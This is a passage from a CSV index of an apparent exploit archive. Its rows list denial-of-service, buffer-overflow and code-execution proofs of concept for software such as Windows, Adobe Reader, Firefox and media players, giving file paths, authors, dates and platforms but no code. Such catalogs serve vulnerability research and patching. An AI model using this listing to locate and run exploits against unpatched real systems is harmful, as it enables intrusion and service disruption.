(PoC)",2010-05-18,JMIT,dos,netbsd_x86, +12655,exploits/windows/dos/12655.txt,"QtWeb Browser 3.3 - Denial of Service",2010-05-18,PoisonCode,dos,windows, +28049,exploits/windows/dos/28049.html,"GreenBrowser 6.4.0515 - Heap Overflow",2013-09-03,Asesino04,dos,windows, +28050,exploits/windows/dos/28050.txt,"Oracle Java lookUpByteBI - Heap Buffer Overflow",2013-09-03,GuHe,dos,windows, +28051,exploits/windows/dos/28051.py,"PotPlayer 1.5.39036 - '.wav' Crash (PoC)",2013-09-03,ariarat,dos,windows, +12683,exploits/windows/dos/12683.pl,"SolarWinds TFTP Server 10.4.0.10 - Denial of Service",2010-05-21,Nullthreat,dos,windows,69 +12687,exploits/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,dos,windows, +12698,exploits/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,dos,windows, +12704,exploits/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)",2010-05-23,"sniper ip",dos,windows, +12740,exploits/windows/dos/12740.py,"Webby WebServer - Overflow (SEH) (PoC)",2010-05-25,m-1-k-3,dos,windows, +12741,exploits/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,dos,windows, +12751,exploits/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,dos,windows, +12752,exploits/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,dos,windows, +12753,exploits/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,dos,windows, +12762,exploits/freebsd/dos/12762.txt,"FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)",2010-05-27,"Maksymilian Arciemowicz",dos,freebsd, +12774,exploits/windows/dos/12774.py,"Home FTP Server 1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,dos,windows, +12775,exploits/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,dos,multiple, +12816,exploits/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,dos,windows, +12852,exploits/windows/dos/12852.txt,"QtWeb 3.3 - Remote Crash (Denial of Service)",2010-06-03,PoisonCode,dos,windows, +12853,exploits/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1 - Denial of Service",2010-06-03,b0nd,dos,windows, +40087,exploits/multiple/dos/40087.txt,"Adobe Flash - ATF Processing Overflow",2016-07-11,"Google Security Research",dos,multiple, +40088,exploits/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double-Free",2016-07-11,"Google Security Research",dos,multiple, +40089,exploits/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",dos,multiple, +40090,exploits/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",dos,multiple, +40095,exploits/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (1)",2016-07-13,COSIG,dos,multiple, +18615,exploits/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - 'APPE' Remote Denial of Service",2012-03-17,"brock haun",dos,windows, +15498,exploits/multiple/dos/15498.html,"Mozilla Firefox 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep & scox",dos,multiple, +13774,exploits/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPd - Remote Denial of Service (PoC)",2010-06-08,"Dillon Beresford",dos,hardware,80 +13775,exploits/hardware/dos/13775.pl,"Motorola SB5101 - Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford",dos,hardware,80 +13817,exploits/windows/dos/13817.pl,"Adobe InDesign CS3 - '.INDD' Handling Buffer Overflow",2010-06-11,LiquidWorm,dos,windows, +13823,exploits/hardware/dos/13823.txt,"Savy Soda Documents - Mobile Office Suite '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",dos,hardware, +13824,exploits/hardware/dos/13824.txt,"Office^2 iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",dos,hardware, +13825,exploits/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",dos,hardware, +13836,exploits/windows/dos/13836.py,"SolarWinds TFTP Server 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,dos,windows, +13837,exploits/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - mpcpl Local Denial of Service (PoC)",2010-06-12,R3d-D3V!L,dos,windows, +13838,exploits/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,dos,windows, +13870,exploits/ios/dos/13870.py,"iOS QuickOffice 3.1.0 - HTTP Method Remote Denial of Service",2010-06-14,"Nishant Das Patnaik",dos,ios, +13871,exploits/ios/dos/13871.py,"iOS Impact PDF Reader 2.0 - POST Method Remote Denial of Service",2010-06-14,"Nishant Das Patnaik",dos,ios, +13872,exploits/windows/dos/13872.txt,"SumatraPDF 1.1 - Denial of Service (PoC)",2010-06-14,"Matthew Bergin",dos,windows, +13876,exploits/windows/dos/13876.py,"File Sharing Wizard 1.5.0 - Buffer Overflow (PoC)",2010-06-15,m-1-k-3,dos,windows, +13887,exploits/windows/dos/13887.c,"Winplot 2010 - Buffer Overflow (PoC)",2010-06-15,"fl0 fl0w",dos,windows, +13888,exploits/windows/dos/13888.c,"SasCam 2.6.5 - Remote HTTP Server Crash",2010-06-15,"fl0 fl0w",dos,windows, +13906,exploits/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",dos,novell,139 +13919,exploits/windows/dos/13919.c,"Corel VideoStudio Pro X3 - '.mp4' Buffer Overflow",2010-06-18,"fl0 fl0w",dos,windows, +13920,exploits/windows/dos/13920.c,"H264WebCam - Boundary Condition Error",2010-06-18,"fl0 fl0w",dos,windows, +13921,exploits/windows/dos/13921.c,"PowerZip 7.21 (Build 4010) - Stack Buffer Overflow",2010-06-18,"fl0 fl0w",dos,windows, +13934,exploits/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,dos,windows, +13939,exploits/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,dos,windows, +13958,exploits/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,dos,windows, +13959,exploits/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",dos,windows,9987 +13965,exploits/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Overflow (SEH) (PoC)",2010-06-22,blake,dos,windows, +14003,exploits/freebsd/dos/14003.c,"FreeBSD - 'mountnfs()' Denial of Service",2010-06-23,"Patroklos Argyroudis",dos,freebsd, +14010,exploits/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",dos,novell,48080 +14012,exploits/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,dos,multiple,80 +14032,exploits/windows/dos/14032.pl,"Winstats - '.fma' Local Buffer Overflow (PoC)",2010-06-24,Madjix,dos,windows, +14036,exploits/windows/dos/14036.pl,"Geomau 7 - '.wg2' Local Buffer Overflow (PoC)",2010-06-24,Madjix,dos,windows, +14037,exploits/windows/dos/14037.pl,"Plotwn 18 - '.wp2' Local Buffer Overflow (PoC)",2010-06-24,Madjix,dos,windows, +14266,exploits/windows/dos/14266.pl,"IrcDelphi Daemon Server - Denial of Service",2010-07-08,Crash,dos,windows,6667 +14071,exploits/windows/dos/14071.pl,"FoxPlayer 2 - '.m3u' Local Buffer Overflow (PoC)",2010-06-26,Madjix,dos,windows, +14072,exploits/windows/dos/14072.c,"UltraISO 9.3.6.2750 - '.mds' / '.mdf' Buffer Overflow (PoC)",2010-06-27,"fl0 fl0w",dos,windows, +14083,exploits/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,dos,linux, +14295,exploits/windows/dos/14295.html,"Microsoft - 'MSHTML.dll' CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak",2010-07-09,"Ruben Santamarta",dos,windows, +14099,exploits/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service Vulnerabilities",2010-06-28,Markot,dos,windows,80 +14102,exploits/windows/dos/14102.py,"Winamp 5.571 - '.avi' Denial of Service",2010-06-28,"Praveen Darshanam",dos,windows, +14121,exploits/multiple/dos/14121.c,"Adobe Reader 9.3.2 - 'CoolType.dll' Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,dos,multiple, +14156,exploits/windows/dos/14156.txt,"Microsoft Windows Vista/2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,dos,windows, +14175,exploits/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)",2010-07-02,v3n0m,dos,windows, +14185,exploits/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,dos,multiple, +14236,exploits/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,dos,windows,8800 +14268,exploits/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",dos,multiple, +14286,exploits/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-08,"Luigi Auriemma",dos,windows, +14282,exploits/windows/dos/14282.txt,"Microsoft Windows - 'cmd.exe' Unicode Buffer Overflow (SEH)",2010-07-08,bitform,dos,windows, +14290,exploits/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",dos,windows, +15307,exploits/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,dos,windows, +14344,exploits/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - 'wpd' Buffer Overflow (PoC)",2010-07-12,LiquidWorm,dos,windows, +14346,exploits/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - 'shw' Buffer Preoccupation (PoC)",2010-07-12,LiquidWorm,dos,windows, +14349,exploits/windows/dos/14349.html,"Opera - Canvas Element (Denial of Service)",2010-07-12,"Pouya Daneshmand",dos,windows, +14372,exploits/windows/dos/14372.txt,"Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow",2010-07-16,shinnai,dos,windows, +14379,exploits/multiple/dos/14379.txt,"Novell Groupwise Internet Agent - Stack Overflow",2010-07-16,"Francis Provencher",dos,multiple, +14380,exploits/windows/dos/14380.py,"Power/Personal FTP Server - RETR Denial of Service",2010-07-16,antrhacks,dos,windows, +14408,exploits/windows/dos/14408.py,"Really Simple IM 1.3beta - Denial of Service (PoC)",2010-07-18,loneferret,dos,windows, +14413,exploits/windows/dos/14413.txt,"Microsoft Internet Explorer 7 - Microsoft Clip Organizer Multiple Insecure ActiveX Control Denial of Service Vulnerabilities",2010-07-20,"Beenu Arora",dos,windows, +14414,exploits/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Remote Denial of Service",2010-07-20,"Luigi Auriemma",dos,windows, +14422,exploits/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,dos,multiple, +14424,exploits/windows/dos/14424.txt,"Lithtech Engine - Memory Corruption",2010-07-20,"Luigi Auriemma",dos,windows, +14452,exploits/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,dos,linux, +14477,exploits/windows/dos/14477.txt,"Media Player Classic - Heap Overflow / Denial of Service",2010-07-26,"Praveen Darshanam",dos,windows, +14484,exploits/windows/dos/14484.html,"Microsoft Internet Explorer 6/7 - Remote Denial of Service",2010-07-27,"Richard leahy",dos,windows, +14504,exploits/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - Denial of Service (PoC)",2010-07-30,loneferret,dos,windows, +14511,exploits/windows/dos/14511.pl,"ChordPulse 1.4 - Denial of Service",2010-07-30,Madjix,dos,windows, +14525,exploits/windows/dos/14525.pl,"Jaangle 0.98e.971 - Denial of Service",2010-08-02,s-dz,dos,windows, +14515,exploits/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service",2010-07-31,s-dz,dos,windows, +14517,exploits/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service",2010-07-31,s-dz,dos,windows, +14533,exploits/windows/dos/14533.txt,"Avast! Internet Security 5.0 - 'aswFW.sys' Kernel Driver IOCTL Memory Pool Corruption",2010-08-03,x90c,dos,windows, +14537,exploits/multiple/dos/14537.txt,"Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service",2010-08-03,"Shane Bester",dos,multiple, +14545,exploits/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format Denial of Service",2010-08-03,antrhacks,dos,windows, +14555,exploits/windows/dos/14555.py,"MediaMonkey 3.2.1.1297 - Denial of Service (PoC)",2010-08-05,anonymous,dos,windows, +14573,exploits/linux/dos/14573.txt,"LibTIFF - 'td_stripbytecount' Null Pointer Dereference Remote Denial of Service",2010-08-07,"Tomas Hoger",dos,linux, +14582,exploits/windows/dos/14582.pl,"ffdshow Video Codec - Denial of Service",2010-08-08,"Nishant Das Patnaik",dos,windows, +14587,exploits/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service",2010-08-09,"Oh Yaw Theng",dos,windows, +14584,exploits/windows/dos/14584.py,"QQ Computer Manager - 'TSKsp.sys' Local Denial of Service",2010-08-09,"Lufeng Li",dos,windows, +14593,exploits/windows/dos/14593.html,"AoAAudioExtractor 2.0.0.0 - ActiveX (PoC) (SEH)",2010-08-09,s-dz,dos,windows, +14594,exploits/linux/dos/14594.py,"Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service",2010-08-09,"Jon Oberheide",dos,linux, +14597,exploits/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder - Denial of Service",2010-08-10,"Oh Yaw Theng",dos,windows, +14601,exploits/windows/dos/14601.py,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)",2010-08-10,anonymous,dos,windows, +14607,exploits/windows/dos/14607.py,"Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"laurent gaffie",dos,windows, +14608,exploits/windows/dos/14608.txt,"Microsoft Windows - CreateWindow Function Callback (MS10-048)",2010-08-10,"Core Security",dos,windows, +14609,exploits/windows/dos/14609.py,"Microsoft Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,dos,windows, +14611,exploits/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Privilege Escalation (MS10-048)",2010-08-10,MJ0011,dos,windows, +14613,exploits/windows/dos/14613.py,"Microsoft Windows Live Messenger 14.0.8117 - Animation Remote Denial of Service",2010-08-11,TheLeader,dos,windows, +14620,exploits/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",dos,windows, +14621,exploits/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",dos,windows, +14624,exploits/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",dos,windows, +14625,exploits/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",dos,windows, +14634,exploits/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 - 'scvncsrvx.dll' Denial of Service",2010-08-13,LiquidWorm,dos,windows, +14642,exploits/windows/dos/14642.txt,"Acrobat Acrobat - Font Parsing Integer Overflow",2010-08-14,"Ramz Afzar",dos,windows, +14646,exploits/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)",2010-08-14,fdiskyou,dos,windows, +14666,exploits/windows/dos/14666.txt,"Microsoft Windows - nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)",2010-08-17,"Tavis Ormandy",dos,windows, +14667,exploits/windows/dos/14667.txt,"Microsoft Windows - KTM Invalid Free with Reused Transaction GUID (MS10-047)",2010-08-17,"Tavis Ormandy",dos,windows, +14668,exploits/windows/dos/14668.txt,"Microsoft Windows - Win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks",2010-08-17,"Tavis Ormandy",dos,windows, +14669,exploits/windows/dos/14669.txt,"Microsoft Windows - Win32k!GreStretchBltInternal() Does Not Handle src == dest",2010-08-17,"Tavis Ormandy",dos,windows, +14670,exploits/windows/dos/14670.txt,"Microsoft Windows - nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047)",2010-08-17,"Tavis Ormandy",dos,windows, +14671,exploits/windows/dos/14671.py,"Brazip 9.0 - '.zip' Buffer Overflow (SEH)",2010-08-17,ITSecTeam,dos,windows, +14687,exploits/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN - ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",dos,windows, +14678,exploits/php/dos/14678.txt,"PHP 5.3.3 - 'ibase_gen_id()' Off-by-One Overflow",2010-08-18,"Canberk BOLAT",dos,php, +14679,exploits/windows/dos/14679.pl,"VbsEdit 4.6.1.0 - Denial of Service",2010-08-18,"C.G. Tan",dos,windows, +14683,exploits/windows/dos/14683.py,"httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC)",2010-08-18,Dr_IDE,dos,windows, +14685,exploits/windows/dos/14685.pl,"RockN Wav Editor 1.8 - Denial of Service",2010-08-18,d4rk-h4ck3r,dos,windows, +14689,exploits/windows/dos/14689.pl,"Tuniac 100723 - Denial of Service",2010-08-19,d4rk-h4ck3r,dos,windows, +14690,exploits/windows/dos/14690.pl,"Fennec 1.2 Beta 3 - Denial of Service",2010-08-19,d4rk-h4ck3r,dos,windows, +14695,exploits/windows/dos/14695.pl,"Karaoke Video Creator 2.2.8 - Denial of Service",2010-08-20,PASSEWORD,dos,windows, +14698,exploits/windows/dos/14698.py,"AV Music Morpher Gold 5.0.38 - '.m3u' Denial of Service",2010-08-20,b0telh0,dos,windows, +14699,exploits/windows/dos/14699.py,"PlayPad Music Player 1.12 - '.mp3' Denial of Service",2010-08-20,"Praveen Darshanam",dos,windows, +14705,exploits/windows/dos/14705.c,"Microsoft Windows - IcmpSendEcho2Ex Interrupting Denial of Service",2010-08-21,l3D,dos,windows, +14711,exploits/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service",2010-08-23,41.w4r10r,dos,windows, +14713,exploits/windows/dos/14713.py,"Abyssal Metal Player 2.0.9 - Denial of Service",2010-08-23,41.w4r10r,dos,windows, +14761,exploits/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,dos,multiple, +14767,exploits/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",dos,windows, +14824,exploits/windows/dos/14824.txt,"LeadTools ActiveX Raster Twain 16.5 - 'LtocxTwainu.dll' Buffer Overflow",2010-08-28,LiquidWorm,dos,windows, +14832,exploits/windows/dos/14832.rb,"SnackAmp 3.1.2 - '.wav' Buffer Overflow (PoC)",2010-08-29,"James Fitts",dos,windows, +14840,exploits/windows/dos/14840.py,"Mereo 1.9.2 - Remote HTTP Server Denial of Service",2010-08-30,"CwG GeNiuS",dos,windows, +14843,exploits/windows/dos/14843.txt,"Apple QuickTime - '_Marshaled_pUnk' Backdoor Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta",dos,windows, +14852,exploits/windows/dos/14852.txt,"LeadTools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,dos,windows, +14858,exploits/windows/dos/14858.txt,"Autodesk MapGuide Viewer - ActiveX Denial of Service",2010-09-01,d3b4g,dos,windows, +14869,exploits/windows/dos/14869.py,"Apple QuickTime FlashPix NumberOfTiles - Remote Code Execution",2010-09-02,Abysssec,dos,windows, +14866,exploits/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",dos,novell, +14882,exploits/windows/dos/14882.txt,"FFDshow - Overflow (SEH) Exception Leading to Null Pointer on Read",2010-09-03,"Matthew Bergin",dos,windows, +14883,exploits/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",dos,windows, +14892,exploits/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,dos,windows, +14904,exploits/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,dos,linux, +14909,exploits/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow Crash (SEH) (PoC)",2010-09-05,"Abhishek Lyall",dos,windows, +14916,exploits/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe execvp_nc' Remote Code Execution",2010-09-06,Abysssec,dos,windows, +14928,exploits/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,dos,novell, +14937,exploits/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,dos,windows, +14938,exploits/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,dos,windows, +14947,exploits/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",dos,bsd, +14949,exploits/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,dos,windows, +14967,exploits/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",dos,windows, +14971,exploits/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,dos,windows, +14974,exploits/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 (Multiple Modules) - Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,dos,windows, +14987,exploits/windows/dos/14987.py,"Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",dos,windows, +14990,exploits/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash (PoC)",2010-09-13,SONIC,dos,windows, +14992,exploits/windows/dos/14992.py,"RealPlayer - FLV Parsing Integer Overflow",2010-09-13,Abysssec,dos,windows, +15008,exploits/windows/dos/15008.py,"Ipswitch Imail Server - List Mailer Reply-To Address Memory Corruption",2010-09-15,Abysssec,dos,windows, +15017,exploits/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - '.mp3' / '.wma' Denial of Service",2010-09-16,"Carlos Mario Penagos Hollmann",dos,windows, +15019,exploits/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution",2010-09-16,Abysssec,dos,windows, +15193,exploits/windows/dos/15193.pl,"Hanso Player 1.3.0 - '.m3u' Denial of Service",2010-10-03,"xsploited security",dos,windows, +15027,exploits/windows/dos/15027.py,"Mozilla Firefox 3.6.4 - 'Plugin' EnsureCachedAttrParamArrays Remote Code Execution",2010-09-17,Abysssec,dos,windows, +15032,exploits/windows/dos/15032.py,"MediaHuman Music Converter 1.0.1 - '.wav' / '.mp3' Denial of Service",2010-09-17,modpr0be,dos,windows, +15034,exploits/windows/dos/15034.txt,"Microsoft Mspaint - '.bmp' Crash (PoC)",2010-09-18,andrew,dos,windows, +15035,exploits/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,dos,windows, +15054,exploits/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow (PoC)",2010-09-19,The_UnKn@wn,dos,linux, +15061,exploits/windows/dos/15061.txt,"Microsoft DRM Technology - 'msnetobj.dll' ActiveX Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",dos,windows, +15062,exploits/linux/dos/15062.txt,"RarCrack 0.2 - 'Filename init() .bss' (PoC)",2010-09-20,Stoke,dos,linux, +15065,exploits/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,dos,windows, +15076,exploits/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,dos,windows, +15112,exploits/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)",2010-09-26,Abysssec,dos,windows, +15086,exploits/multiple/dos/15086.py,"Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution",2010-09-23,Abysssec,dos,multiple, +15088,exploits/windows/dos/15088.txt,"Microsoft Excel - HFPicture Record Parsing Memory Corruption",2010-09-23,Abysssec,dos,windows, +15096,exploits/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,dos,windows, +15103,exploits/windows/dos/15103.py,"VMware Workstation 7.1.1 - 'VMkbd.sys' Denial of Service",2010-09-25,"Lufeng Li",dos,windows, +15104,exploits/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,dos,windows, +15122,exploits/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing",2010-09-27,Abysssec,dos,windows, +15131,exploits/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - '.m3u' Denial of Service",2010-09-27,4n0nym0us,dos,windows, +15148,exploits/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,dos,windows, +15158,exploits/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)",2010-09-30,Abysssec,dos,windows, +15167,exploits/windows/dos/15167.txt,"Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)",2010-10-01,kingcope,dos,windows, +15188,exploits/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service",2010-10-02,m0ebiusc0de,dos,ios, +15212,exploits/osx/dos/15212.txt,"Adobe Acrobat and Reader - Array Indexing Remote Code Execution",2010-10-06,"Knud & nSense",dos,osx, +15214,exploits/win_x86/dos/15214.py,"HP Data Protector Media Operations - Null Pointer Dereference Remote Denial of Service",2010-10-06,d0lc3,dos,win_x86,19813 +15215,exploits/multiple/dos/15215.txt,"libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)",2010-10-07,"Maksymilian Arciemowicz",dos,multiple, +15598,exploits/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - '.m3u8' Buffer Overflow",2010-11-23,anT!-Tr0J4n,dos,windows, +15229,exploits/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",dos,windows, +15242,exploits/windows/dos/15242.html,"Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups",2010-10-13,Skylined,dos,windows, +15243,exploits/windows/dos/15243.html,"Oracle Java - APPLET Tag Children Property Memory Corruption",2010-10-13,Skylined,dos,windows, +15245,exploits/solaris/dos/15245.txt,"Oracle Solaris - 'su' Crash",2010-10-13,prdelka,dos,solaris, +15248,exploits/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",dos,windows, +15250,exploits/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,dos,windows, +15263,exploits/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service",2010-10-16,"MOHAMED ABDI",dos,windows, +15264,exploits/aix/dos/15264.py,"PHP Hosting Directory 2.0 - Database Disclosure (Python)",2010-10-16,ZoRLu,dos,aix, +15257,exploits/windows/dos/15257.py,"PCDJ Karaoki 0.6.3819 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows, +15258,exploits/windows/dos/15258.py,"DJ Legend 6.01 - Denial of Service",2010-10-15,"MOHAMED ABDI",dos,windows, +15259,exploits/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",dos,windows, +15260,exploits/windows/dos/15260.txt,"Rocket Software UniData 7.2.7.3806 - Denial of Service",2010-10-15,"Luigi Auriemma",dos,windows, +15261,exploits/multiple/dos/15261.txt,"IBM solidDB 